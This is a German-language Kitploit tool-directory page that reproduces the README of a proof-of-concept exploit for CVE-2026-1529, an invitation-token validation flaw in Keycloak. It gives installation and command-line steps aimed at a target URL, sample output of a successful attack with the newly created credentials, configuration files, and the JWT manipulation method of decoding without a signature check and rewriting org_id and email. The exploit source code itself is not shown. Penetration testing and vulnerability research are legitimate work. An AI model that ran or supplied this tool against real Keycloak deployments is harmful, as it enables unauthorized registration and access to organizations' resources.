Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — Exploit-Tool für CVE-2026-1529, das eine unbefugte Organisationsregistrierung in Keycloak über JWT-Token-Manipulation demonstriert. Enthält Token-Generierung, -Manipulation und Benutzerregistrierung mit Berichtserstellung. | Kitploit
Tools/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungAPI-Sicherheit
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Exploit-Tool für CVE-2026-1529, das eine unbefugte Organisationsregistrierung in Keycloak über JWT-Token-Manipulation demonstriert. Enthält Token-Generierung, -Manipulation und Benutzerregistrierung mit Berichtserstellung.

Repository anzeigenWebseite
38vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1529 Keycloak Exploit-Tool

Keycloak: Nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens


Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken. Verwenden Sie es nur auf Systemen, für die Sie ausdrücklich die Erlaubnis zum Testen haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch. Die Autoren dieses Tools sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Erstellt von: f3ds cr3w est, 2002


Übersicht

CVE-2026-1529 ist eine kritische Schwachstelle in Keycloak, die eine nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens ermöglicht. Dieses Exploit-Tool demonstriert die Schwachstelle, indem es JWT-Tokens manipuliert, um Benutzer in nicht autorisierten Organisationen zu registrieren.

Technische Details

  • CVE-ID: CVE-2026-1529
  • Betroffene Software: Keycloak (org.keycloak.services.resources.organizations)
  • CVSS-Score: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Auswirkung: Nicht autorisierter Zugriff auf Organisationsressourcen

Beschreibung der Schwachstelle

Die Schwachstelle besteht im JWT-Token-Validierungsprozess für Organisationseinladungen. Angreifer können die Felder org_id und email in der JWT-Payload manipulieren, wodurch sie Benutzer ohne ordnungsgemäße Autorisierung in beliebigen Organisationen registrieren können.


Installation

Voraussetzungen

  • Python 3.7 oder höher
  • pip-Paketmanager

Einrichtung

  1. Klonen oder laden Sie das Exploit-Tool herunter:
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installieren Sie die erforderlichen Abhängigkeiten:
pip install -r requirements.txt
  1. Machen Sie das Exploit-Skript ausführbar:
chmod +x keycloak-exploit.py

Verwendung

Grundlegende Verwendung

# Standardverwendung mit Ziel-URL
python keycloak-exploit.py https://target-keycloak.com

# Hilfe anzeigen
python keycloak-exploit.py -h

# Version anzeigen
python keycloak-exploit.py -v

Erweiterte Verwendung

# Benutzerdefiniertes Einladungstoken verwenden
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Benutzerdefinierte Organisations-ID verwenden
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Benutzerdefinierte Konfigurationsdatei verwenden
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Debug-Logging aktivieren
python keycloak-exploit.py -d https://target-keycloak.com

Befehlszeilenoptionen

OptionBeschreibungErforderlich
targetZiel-Keycloak-URL (IP oder Domain)Ja
-t, --tokenBenutzerdefiniertes EinladungstokenNein
-o, --org-idBenutzerdefinierte Organisations-IDNein
-c, --configPfad zur KonfigurationsdateiNein
-d, --debugDebug-Logging aktivierenNein
-v, --versionVersionsinformationen anzeigenNein
-h, --helpHilfemeldung anzeigenNein

Ausgabe

Erfolgreicher Exploit

Wenn der Exploit erfolgreich ist, sehen Sie eine Ausgabe wie:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Fehlgeschlagener Exploit

Wenn der Exploit fehlschlägt, sehen Sie:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Projektstruktur

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Konfiguration

Standardkonfiguration

Das Tool verwendet eine Standardkonfigurationsdatei (config/default_config.json) mit den folgenden Einstellungen:

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Benutzerdefinierte Konfiguration

Sie können eine benutzerdefinierte Konfigurationsdatei erstellen und diese mit der Option -c verwenden:

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Technische Details

Exploit-Prozess

  1. Zielanalyse: Prüfen, ob das Ziel eine anfällige Keycloak-Instanz ist
  2. Token-Generierung: Generieren oder Verwenden eines benutzerdefinierten Einladungstokens
  3. Token-Manipulation: Manipulieren der JWT-Payload, um die Organisations-ID zu ändern
  4. Benutzerregistrierung: Registrieren eines Benutzers mit dem manipulierten Token
  5. Login-Test: Überprüfen, ob sich der erstellte Benutzer anmelden kann
  6. Berichtserstellung: Erstellen eines detaillierten Exploit-Berichts

JWT-Manipulation

Das Tool nutzt die unsachgemäße JWT-Validierung aus, indem es:

  1. Das JWT-Token ohne Signaturprüfung dekodiert
  2. Das Feld org_id ändert, um eine andere Organisation anzuvisieren
  3. Das Feld email bei Bedarf ändert
  4. Das Token mit der manipulierten Payload neu kodiert

Sicherheitsüberlegungen

  • Das Tool verwendet ordnungsgemäße Fehlerbehandlung und Protokollierung
  • Alle Netzwerkanfragen enthalten geeignete Header
  • Eingabevalidierung wird für alle Benutzereingaben durchgeführt
  • Das Tool respektiert die Serverantwortcodes des Ziels

Fehlerbehebung

Häufige Probleme

  1. Verbindungsfehler

    • Prüfen, ob die Ziel-URL erreichbar ist
    • Verifizieren, dass das Ziel eine Keycloak-Instanz ist
    • Netzwerkkonnektivität und Firewall-Einstellungen prüfen
  2. Token-Validierungsfehler

    • Sicherstellen, dass das Token-Format korrekt ist
    • Prüfen, ob das Token die erforderlichen Felder enthält (org_id, email, invitation_type)
    • Verifizieren, dass das Token nicht abgelaufen ist
Tool herunterladen